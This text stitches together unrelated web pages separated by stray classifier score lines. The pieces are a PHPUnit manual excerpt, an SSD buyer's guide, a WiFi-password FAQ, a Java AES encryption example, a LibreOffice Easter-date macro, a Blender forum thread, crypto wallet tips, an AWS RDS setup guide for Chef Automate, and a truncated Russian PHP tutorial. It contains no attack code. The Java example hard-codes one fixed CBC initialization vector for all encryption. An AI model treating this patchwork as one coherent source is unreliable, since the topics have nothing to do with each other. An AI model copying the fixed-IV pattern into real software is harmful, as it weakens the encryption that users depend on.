arguments from the data provider will come before the ones from depended-upon tests. The arguments from depended-upon tests will be the same for each data set. See Example 2.9 Example 2.9 Combination of @depends and @dataProvider in same test <?php use PHPUnit\Framework\TestCase; class DependencyAndDataProviderComboTest extends TestCase { public function provider() { return [['provider1'], ['provider2']]; } public function testProducerFirst() { $this->assertTrue(true); return 'first'; } public function testProducerSecond() { $this->assertTrue(true); return 'second'; } /** * @depends testProducerFirst * @depends testProducerSecond * @dataProvider provider */ public function testConsumer() { $this->assertSame( ['provider1', 'first', 'second'], func_get_args() ); } } $ phpunit --verbose DependencyAndDataProviderComboTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 3.50Mb There was 1 failure: 1) DependencyAndDataProviderComboTest::testConsumer with data set #1 ('provider2') Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ Array &0 ( - 0 => 'provider1' + 0 => 'provider2' 1 => 'first' 2 => 'second' ) /home/sb/DependencyAndDataProviderComboTest.php:32 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Note When a test depends on a test that uses data providers, the depending test will be executed when the test it depends upon is successful for at least one data set. The result of a test that uses data providers cannot be injected into a depending test. Note All data providers are executed before both the call to the setUpBeforeClass static method and the first call to the setUp method. Because of that you can’t access any variables you create there from within a data provider. This is required in order for PHPUnit to be able to compute the total number of tests. Testing Exceptions Example 2.10 shows how to use the expectException() method to test whether an exception is thrown by the code under test. Example 2.10 Using the expectException() method <?php use PHPUnit\Framework\TestCase; class ExceptionTest extends TestCase { public function testException() { $this->expectException(InvalidArgumentException::class); } } $ phpunit ExceptionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 4.75Mb There was 1 failure: 1) ExceptionTest::testException Failed asserting that exception of type "InvalidArgumentException" is thrown. FAILURES! Tests: 1, Assertions: 1, Failures: 1. In addition to the expectException() method the expectExceptionCode(), expectExceptionMessage(), and expectExceptionMessageRegExp() methods exist to set up expectations for exceptions raised by the code under test. Note Note that expectExceptionMessage asserts that the $actual message contains the $expected message and doesn’t perform an exact string comparison. Alternatively, you can use the @expectedException, @expectedExceptionCode, @expectedExceptionMessage, and @expectedExceptionMessageRegExp annotations to set up expectations for exceptions raised by the code under test. Example 2.11 shows an example. Example 2.11 Using the @expectedException annotation <?php use PHPUnit\Framework\TestCase; class ExceptionTest extends TestCase { /** * @expectedException InvalidArgumentException */ public function testException() { } } $ phpunit ExceptionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 4.75Mb There was 1 failure: 1) ExceptionTest::testException Failed asserting that exception of type "InvalidArgumentException" is thrown. FAILURES! Tests: 1, Assertions: 1, Failures: 1. Testing PHP Errors By default, PHPUnit converts PHP errors, warnings, and notices that are triggered during the execution of a test to an exception. Using these exceptions, you can, for instance, expect a test to trigger a PHP error as shown in Example 2.12. Note PHP’s error_reporting runtime configuration can limit which errors PHPUnit will convert to exceptions. If you are having issues with this feature, be sure PHP is not configured to suppress the type of errors you’re testing. Example 2.12 Expecting a PHP error using @expectedException <?php use PHPUnit\Framework\TestCase; class ExpectedErrorTest extends TestCase { /** * @expectedException PHPUnit\Framework\Error\Error */ public function testFailingInclude() { include 'not_existing_file.php'; } } $ phpunit -d error_reporting=2 ExpectedErrorTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. . Time: 0 seconds, Memory: 5.25Mb OK (1 test, 1 assertion) PHPUnit\Framework\Error\Notice and PHPUnit\Framework\Error\Warning represent PHP notices and warnings, respectively. Note You should be as specific as possible when testing exceptions. Testing for classes that are too generic might lead to undesirable side-effects. Accordingly, testing for the Exception class with @expectedException or expectException() is no longer permitted. When testing that relies on php functions that trigger errors like fopen it can sometimes be useful to use error suppression while testing. This allows you to check the return values by suppressing notices that would lead to a phpunit PHPUnit\Framework\Error\Notice. Example 2.13 Testing return values of code that uses PHP Errors <?php use PHPUnit\Framework\TestCase; class ErrorSuppressionTest extends TestCase { public function testFileWriting() { $writer = new FileWriter; $this->assertFalse(@$writer->write('/is-not-writeable/file', 'stuff')); } } class FileWriter { public function write($file, $content) { $file = fopen($file, 'w'); if($file == false) { return false; } // ... } } $ phpunit ErrorSuppressionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. . Time: 1 seconds, Memory: 5.25Mb OK (1 test, 1 assertion) Without the error suppression the test would fail reporting fopen(/is-not-writeable/file): failed to open stream: No such file or directory. Testing Output Sometimes you want to assert that the execution of a method, for instance, generates an expected output (via echo or print, for example). The PHPUnit\Framework\TestCase class uses PHP’s Output Buffering feature to provide the functionality that is necessary for this. Example 2.14 shows how to use the expectOutputString() method to set the expected output. If this expected output is not generated, the test will be counted as a failure. Example 2.14 Testing the output of a function or method <?php use PHPUnit\Framework\TestCase; class OutputTest extends TestCase { public function testExpectFooActualFoo() { $this->expectOutputString('foo'); print 'foo'; } public function testExpectBarActualBaz() { $this->expectOutputString('bar'); print 'baz'; } } $ phpunit OutputTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. .F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) OutputTest::testExpectBarActualBaz Failed asserting that two strings are equal. --- Expected +++ Actual @@ @@ -'bar' +'baz' FAILURES! Tests: 2, Assertions: 2, Failures: 1. Table 2.1 shows the methods provided for testing output Table 2.1 Methods for testing output Method Meaning void expectOutputRegex(string $regularExpression) Set up the expectation that the output matches a $regularExpression. void expectOutputString(string $expectedString) Set up the expectation that the output is equal to an $expectedString. bool setOutputCallback(callable $callback) Sets up a callback that is used to, for instance, normalize the actual output. string getActualOutput() Get the actual output. Note A test that emits output will fail in strict mode. Error output Whenever a test fails PHPUnit tries its best to provide you with as much context as possible that can help to identify the problem. Example 2.15 Error output generated when an array comparison fails <?php use PHPUnit\Framework\TestCase; class ArrayDiffTest extends TestCase { public function testEquality() { $this->assertSame( [1, 2, 3, 4, 5, 6], [1, 2, 33, 4, 5, 6] ); } } $ phpunit ArrayDiffTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) ArrayDiffTest::testEquality Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ Array ( 0 => 1 1 => 2 - 2 => 3 + 2 => 33 3 => 4 4 => 5 5 => 6 ) /home/sb/ArrayDiffTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. In this example only one of the array values differs and the other values are shown to provide context on where the error occurred. When the generated output would be long to read PHPUnit will split it up and provide a few lines of context around every difference. Example 2.16 Error output when an array comparison of an long array fails <?php use PHPUnit\Framework\TestCase; class LongArrayDiffTest extends TestCase { public function testEquality() { $this->assertSame( [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4, 5, 6], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 33, 4, 5, 6] ); } } $ phpunit LongArrayDiffTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) LongArrayDiffTest::testEquality Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ 11 => 0 12 => 1 13 => 2 - 14 => 3 + 14 => 33 15 => 4 16 => 5 17 => 6 ) /home/sb/LongArrayDiffTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. Edge cases When a comparison fails PHPUnit creates textual representations of the input values and compares those. Due to that implementation a diff might show more problems than actually exist. This only happens when using assertEquals or other ‘weak’ comparison functions on arrays or objects. Example 2.17 Edge case in the diff generation when using weak comparison <?php use PHPUnit\Framework\TestCase; class ArrayWeakComparisonTest extends TestCase { public function testEquality() { $this->assertEquals( [1, 2, 3, 4, 5, 6], ['1', 2, 33, 4, 5, 6] ); } } $ phpunit ArrayWeakComparisonTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) ArrayWeakComparisonTest::testEquality Failed asserting that two arrays are equal. --- Expected +++ Actual @@ @@ Array ( - 0 => 1 + 0 => '1' 1 => 2 - 2 => 3 + 2 => 33 3 => 4 4 => 5 5 => 6 ) /home/sb/ArrayWeakComparisonTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. In this example the difference in the first index between 1 and '1' is reported even though assertEquals considers the values as a match.
__label__pos
0.926048
SSD Buyers Guide When you build that high performance, custom PC it’s easy to see the benefits of a faster processor or beefier graphics card, but high-performance storage is still a confusing topic. Instead of having two major brands to choose from, as with processors or graphics cards, there are many different types of SSD, all of which perform differently in some way. To add even more confusion, drives are then sold by partners with completely different names rather than keep the original designers branding in the same way as Nvidia or ATI’s GeForce or Radeon graphics cards. With this in mind, we’ve decided to knock together an SSD buyers guide, listing the different controllers and their pros and cons, as well as exactly which SSDs use which controller. While some drive manufacturers claim that only enthusiasts care about what’s inside an SSD we feel the continued high price of drives means that people need to know exactly what's in the box before they should buy one. *SSD Buyer's Guide SSD Buyers Guide SSD basics An SSD is very different to a typical hard disk because its uses flash memory rather than spinning platters of data. A hard disk works a bit like a record player or DVD – the data is stored in tight tracks on a circular disk which a read/write head must find as the disk spins underneath it. While modern hard disks are amazingly complex, the technology has its drawbacks – it takes a while for the read/write head to find the correct data path, hard disks can be noisy and hot, and they are relatively fragile. An SSD avoids most of these issues as it uses NAND flash chips for its storage, and not a spinning data platter. All SSDs have a central controller chip which manages the data flowing into and out of the storage chips. There are wildly different implementations of how this arrangement works, leading to massive difference from one drive to another, hence the need for some clarity. *SSD Buyer's Guide SSD Buyers Guide *SSD Buyer's Guide SSD Buyers Guide SSDs and hard disks are very different beasts. Click to enlarge This arrangement of controller chip and NAND flash allows a decent SSD to be much faster than a hard disk, giving you a more responsive PC, while also being much more rugged, cool and silent. However, SSDs are also much more expensive per gigabyte than a hard disk, mainly due to the price of high-capacity NAND flash chips. What makes an SSD so much faster than a hard disk? • Near-instant access times The key to SSDs being so much faster than mechanical hard disks is access times. On SandForce SSDs, such as the 240GB Corsair F240, the read access time can be as low as 1/10th of a millisecond, in comparison to around 14ms of a high-performance 7,200rpm hard disk like the Samsung SpinPoint F3. This means that every time the SSD goes to read or write a file, it does so over 100 times faster than a hard disk. In read-heavy circumstances (booting an operating system or loading a game) where hundreds or thousands of individual files might need to be read, this advantage adds up and means that even an SSD with low sequential read/write speeds can be many times faster than a hard disk. • High sequential speeds Sequential speed is how quickly a drive is able to read or write a large, contiguous file from or to the drive, whereas random speed is how quickly the drive can cope with many small files being read from or written to random places on the drive. Sequential read speed is typically affected by the drive controller and the NAND flash memory used. Sequential write speed can be affected by the drive's capacity, either because a low-capacity drive uses slower lower-density chips or because it uses fewer chips which reduces the amount of storage that the drive controller can address simultaneously. • High random read speed The ‘random’ performance of a storage device is how well it copes with many files in different (random) places being read from or written to it. Random read speed is dependent on both the drive’s access times and the abilities of the drive controller to cope with a flood of different commands. It’s best explained by heavy multi-tasking, where the drive needs to read many different small files. In real-world situations, drive performance is more a combination of sequential and random read performance, as file sizes vary. • High random write speed Random write performance is a more contentious issue, as it’s the area in which the first batch of consumer SSDs fell short, with the drive controller easily getting flooded with random write requests. This lead to the drive stalling, unable to do anything for ages – the problem manifested itself in benchmark results as a high maximum latency. Thankfully, the issue is now fixed, with the majority of consumer SSDs offering random write speeds at least five times higher than that of a fast hard disk. Heavy random write workloads typically arise when making many small writes to log files, the registry, or temporary folders. However, random write speed will have an impact when making simultaneous writes to the drive, working in combination with the sequential write speed in real world situations. A good SSD should be able to deliver on all five aspects of performance: low access times, high sequential read and write and high random read and write. On a great SSD, all five factors will combine to deliver a faster, more responsive PC in every situation. Discuss this in the forums QUICK COMMENT SUBSCRIBE TO OUR NEWSLETTER WEEK IN REVIEW TOP STORIES SUGGESTED FOR YOU
__label__pos
0.857067
Who Can I Find My Wifi Password? Can I see my WiFi password on my iPhone? You’ll be able to see your WiFi password on your iPhone with this procedure in no time. From the main screen of your iPhone, open the Settings app. Tap on WiFi on the following screen. Then tap on the icon next to your WiFi network and it’ll open the screen detailing your WiFi information.. Is there a app to get free WiFi? Free Zone is an Android app that automatically discovers which of the hotspots around you that actually work. You can get access to WiFi passwords shared by others to access local cafes’ or restaurants’ hotspots. The app automatically notifies you if you’re near one of the 5 million hotspots in its database. How do I see the password for my wireless network android? If you’ve got a Google Pixel phone with Android 10, this is the easiest way possible to find your WiFi password.Go to Settings > Network & Internet > WiFi .Tap on the name of the WiFi network you want to recover the password from to get to the Network Details Screen.Tap on the Share button. How do I change my home WiFi password? There are two ways to change your network name and password For Android devices, tap the menu icon in the upper-left corner of the screen, then tap Internet. Tap the Wireless Gateway. Select “Change WiFi Settings.” Enter your new network name and password. How do I find out what my WiFi network password is? See Wi-Fi Password on Android If you’re lucky enough to be running Android 10, it’s easily accessible: just head to Settings > Network & Internet > Wi-Fi and select the network in question. (If you aren’t currently connected, you’ll need to tap Saved Networks to see other networks you’ve connected to in the past.) How do I find my AirPort WiFi password? Tap on the AirPort Utility.Tap on the appropriate AirPort base station, and then, tap on Edit.Tap on Advanced > Show Passwords (Note: The wireless security password will be listed after “Main Network;” the base station administrator password will be listed after “Base Station.” How do I find my router username and password without resetting it? You Can Look at The Sticker On The Back Of Your Router It is the easiest way to find the router username and password without resetting. You can look at the sticker on the back of the router with all the information you need to access the router’s web user interface. How do I find out my router username and password? To locate the default username and password for the router, look in its manual. If you’ve lost the manual, you can often find it by searching for your router’s model number and “manual” on Google. Or just search for your router’s model and “default password.” How do I reset my router password if I forgot it? If you can’t access the router’s web-based setup page or forgot the router’s password, you may reset the router to its default factory settings. To do this, press and hold the Reset button for 10 seconds. NOTE: Resetting your router to its default factory settings will also reset your router’s password. Why can’t I see my WiFi password? Right-click a saved Wi-Fi network, select Status, and click the “Wireless Properties” button. Click over to the Security tab and check the “Show characters” box to view the saved Wi-Fi password. … If the laptop is not connected, you won’t see the “Wireless Properties” button at all in the “Wi-Fi Status” window. Which app can show WiFi password? WiFi Password Show is an app that displays all the passwords for all the WiFi networks you’ve ever connected to. You do need to have root privileges on your Android smartphone to use it, though. It’s important to understand that this app is NOT for hacking WiFi networks or anything like that. How do I access my router without a password? If you can’t access the router’s web-based setup page or forgot the router’s password, you may reset the router to its default factory settings. To do this, press and hold the Reset button for 10 seconds. NOTE: Resetting your router to its default factory settings will also reset your router’s password. Is it possible to hack WiFi password? Routers with WEP security are easy to hack. WEP is a type of encryption tool used to secure your wireless connection. … The most common mistake that many of us do is using the default WiFi password. Hackers can use the default password to not only hack your WiFi connection but also gain access to the connected devices.
__label__pos
0.986309
Skip to main content Create an Amazon RDS PostgreSQL Instance and Obtain Connection Details Note Chef Automate 4.10.1 released on 6th September 2023 includes improvements to the deployment and installation experience of Automate HA. Please read the blog to learn more about key improvements. Refer to the pre-requisites page (On-Premises, AWS) and plan your usage with your customer success manager or account manager. You can follow the AWS documentation directly for detailed steps on how to create an Amazon RDS PostgreSQL Instance. Below is our guide on the steps required to create an Amazon RDS PostgreSQL instance. This guide will walk you through creating an Amazon RDS PostgreSQL instance and retrieving the necessary connection details, including the hostname, port, username, and password. Prerequisites Before proceeding, make sure you have the following prerequisites in place: • An active AWS account • Sufficient permissions to create Amazon RDS instances Step 1: Sign in to the AWS Management Console 1. Open your preferred web browser and go to the AWS Management Console. 2. Sign in to your AWS account using your credentials. Step 2: Navigate to the Amazon RDS Dashboard 1. Once logged in to the AWS Management Console, search for RDS in the search bar at the top of the page. 2. Click on the Amazon RDS service from the search results to open the Amazon RDS dashboard. Step 3: Create a New Amazon RDS PostgreSQL Instance 1. Click on Create database button in the Amazon RDS dashboard. 2. On the Choose a database creation method page, select the Standard Create option. 3. Under the Engine options section, select PostgreSQL as the database engine. 4. Choose PostgreSQL 13.5-R1. 5. Under the Templates section, select the template that suits your needs or choose the default template. 6. In the Settings section, provide the following information: • DB instance identifier: Enter a unique identifier for your RDS instance. • Master username: Specify the username for the master user account. • Master password: Set a secure password for the master user account. 7. In the Instance configuration section, select the appropriate instance size for your needs. 8. In the Connectivity section, • In Compute resource, select Don’t connect to an EC2 compute resource. • Select Network type as per your requirements. • In Virtual private cloud, select the VPC you want to use for your Automate cluster. • In DB subnet group, choose any private subnet available in your VPC. • In Public Access select NO 9. Configure the remaining settings as per your requirements. 10. Review all the settings and make sure they are accurate. 11. Click on the Create database button to start the creation process. Step 4: Wait for the Amazon RDS Instance to be Created 1. The RDS instance creation process may take a few minutes. Wait for the process to complete. 2. You can monitor the progress of the instance creation on the Amazon RDS dashboard. Step 5: Open the port in the RDS security group 1. Go to the Amazon RDS dashboard. 2. Find and select your newly created PostgreSQL instance from the list. 3. In the instance details view, navigate to the Connectivity & security tab. 4. Open the Security Group under VPC security groups. 5. Under Inbound Rules, edit and select Type as PostgreSQL. 6. Select Source as custom and give appropriate cidr block for your VPC. 7. Click on Save Rules. Step 6: Retrieve Connection Details Once the Amazon RDS PostgreSQL instance is created successfully, you can obtain the necessary connection details. 1. Go to the Amazon RDS dashboard. 2. Find and select your newly created PostgreSQL instance from the list. 3. In the instance details view, navigate to the Connectivity & security tab. 4. Here, you will find the following connection details: • Instance URL: This is the endpoint or hostname of your RDS instance. It will look something like my-rds-instance.abcdefg12345.us-east-1.rds.amazonaws.com. • Port: The port number your PostgreSQL instance listens to. The default port is usually 5432. • Username: The username of the master user account you specified during instance creation. • Password: The password for the master user account. Step 7: Connect to Your Amazon RDS PostgreSQL Instance Using the connection details obtained in the previous step, you can now connect to your Amazon RDS PostgreSQL instance from Automate. Congratulations! You have successfully created an Amazon RDS PostgreSQL instance, and it’s ready to be used with Automate. Edit this page on GitHub Thank you for your feedback! × Search Results
__label__pos
0.569506
/* * [TestCipherAES.java] * * Summary: Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message. * * Copyright: (c) 2009-2017 Roedy Green, Canadian Mind Products, http://mindprod.com * * Licence: This software may be copied and used freely for any purpose but military. * http://mindprod.com/contact/nonmil.html * * Requires: JDK 1.8+ * * Created with: JetBrains IntelliJ IDEA IDE http://www.jetbrains.com/idea/ * * Version History: * 1.0 2008-06-17 */ package com.mindprod.example; import javax.crypto.Cipher; import javax.crypto.CipherInputStream; import javax.crypto.CipherOutputStream; import javax.crypto.KeyGenerator; import javax.crypto.NoSuchPaddingException; import javax.crypto.SecretKey; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.nio.charset.Charset; import java.security.InvalidAlgorithmParameterException; import java.security.InvalidKeyException; import java.security.NoSuchAlgorithmException; import static java.lang.System.*; /** * Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message. * <p/> * This particular version uses AES/CBC/PKCS5Padding * but it fairly easy to convert it to use other algorithms. * Requires a shared secret key. * * @author Roedy Green, Canadian Mind Products * @version 1.0 2008-06-17 * @since 2008-06-17 */ public class TestCipherAES { /** * configure with encryption algorithm to use. Avoid insecure DES. Changes to algorithm may require additional * ivParms. */ private static final String ALGORITHM = "AES"; /** * configure with block mode to use. Avoid insecure ECB. */ private static final String BLOCK_MODE = "CBC"; /** * configure with padding method to use */ private static final String PADDING = "PKCS5Padding"; /** * the encoding to use when converting bytes <--> String */ private static final Charset CHARSET = Charset.forName( "UTF-8" ); /** * 128 bits worth of some random, not particularly secret, but stable bytes to salt AES-CBC with */ private static final IvParameterSpec CBC_SALT = new IvParameterSpec( new byte[] { 7, 34, 56, 78, 90, 87, 65, 43, 12, 34, 56, 78, -123, 87, 65, 43 } ); /** * generate a random AES style Key * * @return the AES key generated. * @throws java.security.NoSuchAlgorithmException if AES is not supported. */ private static SecretKeySpec generateKey() throws NoSuchAlgorithmException { final KeyGenerator kg = KeyGenerator.getInstance( ALGORITHM ); kg.init( 128 );// specify key size in bits final SecretKey secretKey = kg.generateKey(); final byte[] keyAsBytes = secretKey.getEncoded(); return new SecretKeySpec( keyAsBytes, ALGORITHM ); } /** * read an enciphered file and retrieve its plaintext message. * * @param cipher method used to encrypt the file * @param key secret key used to encrypt the file * @param file file where the message was written. * * @return the reconstituted decrypted message. * @throws java.security.InvalidKeyException if something wrong with the key. * @throws java.io.IOException if problems reading the file. */ @SuppressWarnings( { "JavaDoc" } ) private static String readCiphered( Cipher cipher, SecretKeySpec key, File file ) throws InvalidKeyException, IOException, InvalidAlgorithmParameterException { cipher.init( Cipher.DECRYPT_MODE, key, CBC_SALT ); final CipherInputStream cin = new CipherInputStream( new FileInputStream( file ), cipher ); // read big endian short length, msb then lsb final int messageLengthInBytes = ( cin.read() << 8 ) | cin.read(); out.println( file.length() + " enciphered bytes in file" ); out.println( messageLengthInBytes + " reconstituted bytes" ); final byte[] reconstitutedBytes = new byte[ messageLengthInBytes ]; // we can't trust CipherInputStream to give us all the data in one shot int bytesReadSoFar = 0; int bytesRemaining = messageLengthInBytes; while ( bytesRemaining > 0 ) { final int bytesThisChunk = cin.read( reconstitutedBytes, bytesReadSoFar, bytesRemaining ); if ( bytesThisChunk == 0 ) { throw new IOException( file.toString() + " corrupted." ); } bytesReadSoFar += bytesThisChunk; bytesRemaining -= bytesThisChunk; } cin.close(); return new String( reconstitutedBytes, CHARSET ); } /** * write a plaintext message to a file enciphered. * * @param cipher the method to use to encrypt the file. * @param key the secret key to use to encrypt the file. * @param file the file to write the encrypted message to. * @param plainText the plaintext of the message to write. * * @throws java.security.InvalidKeyException if something is wrong with they key * @throws java.io.IOException if there are problems writing the file. * @throws java.security.InvalidAlgorithmParameterException if problems with CBC_SALT. */ private static void writeCiphered( Cipher cipher, SecretKeySpec key, File file, String plainText ) throws InvalidKeyException, IOException, InvalidAlgorithmParameterException { cipher.init( Cipher.ENCRYPT_MODE, key, CBC_SALT ); final CipherOutputStream cout = new CipherOutputStream( new FileOutputStream( file ), cipher ); final byte[] plainTextBytes = plainText.getBytes( CHARSET ); out.println( plainTextBytes.length + " plaintext bytes written" ); // prepend with big-endian short message length, will be encrypted too. cout.write( plainTextBytes.length >>> 8 );// msb cout.write( plainTextBytes.length & 0xff );// lsb cout.write( plainTextBytes ); cout.close(); } /** * Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message. * * @param args not used * * @throws java.security.NoSuchAlgorithmException if AES is not supported * @throws javax.crypto.NoSuchPaddingException if PKCS5 padding is not supported. * @throws java.security.InvalidKeyException if there is something wrong with the key. * @throws java.io.IOException if there are problems reading or writing the file. * @throws java.security.InvalidAlgorithmParameterException if problems with CBC_SALT. */ public static void main( String[] args ) throws InvalidAlgorithmParameterException, InvalidKeyException, IOException, NoSuchAlgorithmException, NoSuchPaddingException { // The secret message we want to send to our secret agent in London. final String plainText = "Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05."; // use a random process to generate an enciphering key SecretKeySpec key = generateKey(); final Cipher cipher = Cipher.getInstance( ALGORITHM + "/" + BLOCK_MODE + "/" + PADDING ); // write out the ciphered message writeCiphered( cipher, key, new File( "transport.bin" ), plainText ); // now try reading message back in deciphering it. final String reconstitutedText = readCiphered( cipher, key, new File( "transport.bin" ) ); out.println( "original: " + plainText ); out.println( "reconstituted: " + reconstitutedText ); // output is: // 62 plaintext bytes written // 80 enciphered bytes in file // 62 reconstituted bytes // original: Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05. // reconstituted: Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05. } }
__label__pos
0.886712
× Welcome to TagMyCode Please login or create account to add a snippet. 0 0   0 Language: Text Posted by: Pavel San Added: Feb 19, 2015 9:50 AM Modified: Feb 19, 2015 10:32 AM Views: 19 Function for LibreOffice to calculate Easter Day (Catolic) in cell. Source: https://en.wikipedia.org/wiki/Computus#Gauss_algorithm 1. REM  *****  BASIC  ***** 2. REM Алгоритм Гаусса вычисления даты Пасхи (католич.) 3. REM Источник: Википедия 4. REM ************************************************ 5. Function EasterDayCatolic(Year) 6. a = Year Mod 19 7. b = Year Mod 4 8. c = Year Mod 7 9. k = int (Year/100) 10. p = int ((13 + 8 * k)/25) 11. q = int (k/4) 12. M = (15 - p + k -q) mod 30 13. N = (4 + k - q) mod 7 14. d = (19 * a + M) mod 30 15. e = (2 * b + 4 * c + 6 * d + N) mod 7 16. If (d + e) <= 9 Then 17. Mo = 3 ' март 18. Da = 22 + d + e 19. Else 20. Mo = 4 ' апрель 21. Da = d + e - 9 22. End If 23. EasterDayCatolic = DateSerial(Year, Mo, Da) 24. End Function
__label__pos
0.986658
Blender Face snap working on hiden grid Blender face snap works like a grid.The further the distance, the more jerky the vertex movement. In the past, a vertex used to slide smoothly on the surface, now it moves with the invisible grid step. This is very disturbing especially in small areas of the topology. What to do with it? It is a bug or there is a setting that switches off the grid for the snap mode in faces? You probably have several snap targets enabled There’s only one high poly Open the snap popover and check what you’ve got selected Face snaping mode selected. I have high poly and low poly. Unchecking “project onto self” should help already ? I took turns in all modes. Together and one at a time. No changes. I tried to make the mesh more dense, but it did not help. Please do a video capture I found a strange reason. If you switch to orthogonal projection mode, everything is fine. The perspective projection is bad. I created a new file, added a susan and subdivided it several times. I copied the version without subdivision. Everything works correctly even in perspective projection mode. Orthogonal projection mode ? What is that ? I recorded a video, you can see where I switch the projection. There indeed looks like there is some sort of “increment” snapping going on… this does not happen on my end. I don’t see a difference between perspective and orthographic view though… (is that what you meant by “orthogonal”? = “oblique projection”) Can you share the file ? No blend file extension here I think I will just do it in orthographic mode (orthographic and orthogonal is the same in this case) Thank you for trying to help. No blend file extension ? I don’t know what you mean
__label__pos
0.90937
Hardware Crypto Wallet Security Tips By Boris Dzhingarov Hardware Crypto Wallets are the secure way to keep your Cryptocurrencies. A hardware crypto wallet is nothing but a hardware device where you can store your cryptocurrency private keys digitally and it allows you to do transactions online and stores the private keys securely in the hardware. How to use a hardware wallet? You just need to plug it into your PC or laptop and use the website to do the transactions. Your computer will initialize the hardware wallet and automatically install the secured wallet software that creates the public and private keys. These keys are stored internally in the hardware and they are considered secure because they are stored in the hardware device. Are hardware crypto wallet devices secure? Hardware crypto wallets are considered to be more secure because they are physical hardware devices and are not easy to hack. Which hardware crypto wallet is considered to be the best? • Trezor hardware crypto wallet is considered to be the best bitcoin hardware crypto wallet in 2021. • There is also a simplified version called Trezor One. • Ledger Nano S. is another best hardware crypto wallet that protects everything by a PIN. • Coinkite ColdCard and Billfold Steel are also considered to be safe hardware crypto wallets. How many hardware crypto wallets one must have? It is always safe to have multiple hardware wallets as you cannot rely on a single hardware wallet. With a single wallet, you may lose it or it may get destroyed accidentally. If you have multiple wallets, the other wallet will be helpful to recover the crypto funds. So, you should at least have two hardware wallets. How to secure your hardware crypto wallets? The following hardware crypto wallet security tips will help you protect your crypto funds more secure: 1. Always buy Hardware wallets from the original hardware manufacturer or their authorized dealers with a legitimate license. 2. Don’t go for discounted offers and don’t buy hardware wallets online. 3. Don’t ever buy a used hardware crypto wallet. 4. When you use your hardware wallet for the first time, check the display for error messages. They could indicate if the hardware is tampered with or not. 5. In a new crypto hardware wallet, the Seed will not be pre-printed. If your new hardware wallet has Seed pre-printed, your hardware wallet always is suspect. So, don’t buy if the Seed pre-printed. 6. Your new hardware wallet will generate the Seed when you start the hardware wallet for the first time. Write this down on paper.  This will be needed again when you switch to a new wallet. 7. Always use the software provided with your hardware wallet. A hardware wallet cannot work without a software 8. Don’t use third-party software with your hardware wallet. Use the one provided by the manufacturer. 9. People buy Hardware crypto wallets to store larger amounts of cryptocurrencies. Many hardware manufacturers will provide a manual on how to inspect your new hardware wallet to be original or altered. 8. 10. Hardware crypto wallets will also have internal checks when you run the software provided with the hardware. The software detects in case the hardware is compromised and displays error messages on the display of the hardware. Featured Image Source: Flickr
__label__pos
0.940904
Synchronize Result Step Synchronize and switch the subcase and simulation across multiple windows on the page. Figure 1. Synchronize Result Step Across Multiple Windows 1. From the Tools menu, select Synchronize Result Step. The Synchronize Result Step dialog is displayed. Note: • A model must be loaded in the active window to allow the tool to start. • The animation mode must be either Linear or Modal. Figure 2. Synchronize Result Step Dialog 2. Select windows to synchronize using the button. 3. Optional: Apply the loadcase and simulation in the current window to all selected windows (in Step 2) using the button. 4. Switch to the previous and next subcases across all selected windows using the Subcase Up and Subcase Down buttons respectively. 5. Switch to the previous and next simulation across all selected windows using the Sim Previous and Sim Next buttons respectively. 6. Optional: Change the step size by which the loadcase and simulations are switching by expanding the Advanced options using the down arrow and selecting a step size. Figure 3. 7. Optional: Apply Style from the current window to all HyperView windows on the current page by using the Select Options button. The Select Options dialog is the same as the Apply Style workflow.
__label__pos
0.539542
Загрузка RUS | ANG | | StepkinBlog.ru Пока я творю, я живу! Блог посвящен: HTML, CSS, PHP, Wordpress, Bootstrap Главная » Основы PHP » Оператор условия if else Основы PHP с нуля Урок №9 12.09.2017 01:17 1936 пока нет Оператор условия if else Основы PHP с нуля Урок №9 Оператор условия if else Основы PHP с нуля Урок №9 Всем привет! Продолжаем изучать основы PHP с нуля! В этом уроке я расскажу вам об операторе условий if else. В буквальном переводе if означаете «если», а else – «иначе». Сама конструкция if else помогает сверять данные и выводить результат (выводить сообщения, выполнять какую-то команду, перенаправлять пользователя на секретную страницу или впускать в админ-панель). Чтобы научиться писать правильно условия и понять конструкцию if else, я наведу жизненный пример, который очень похож на конструкцию if else. Вы даете своему мозгу команду: как только звучит будильник (6:00), я должен встать, умыться, почистить зубы, одеться и галопом бежать на работу. Если будильник не звонит в 6:00, значит можно спать, так как на работу бежать не нужно. Вы заметили конструкцию if else? Условием будет установленное время будильника «6:00». Если будильник звонит, то встаем и бежим на работу, если не звонит (иначе, еще говорят ложь), значит, спим дальше. Таких примеров жизненных можно навести массу, например: если идет дождь, то сижу дома, если нет дождя, тогда беру мяч и иду играть футбол. Итак, как же можно записать конструкцию if else? Очень просто. Пойдем поэтапно и 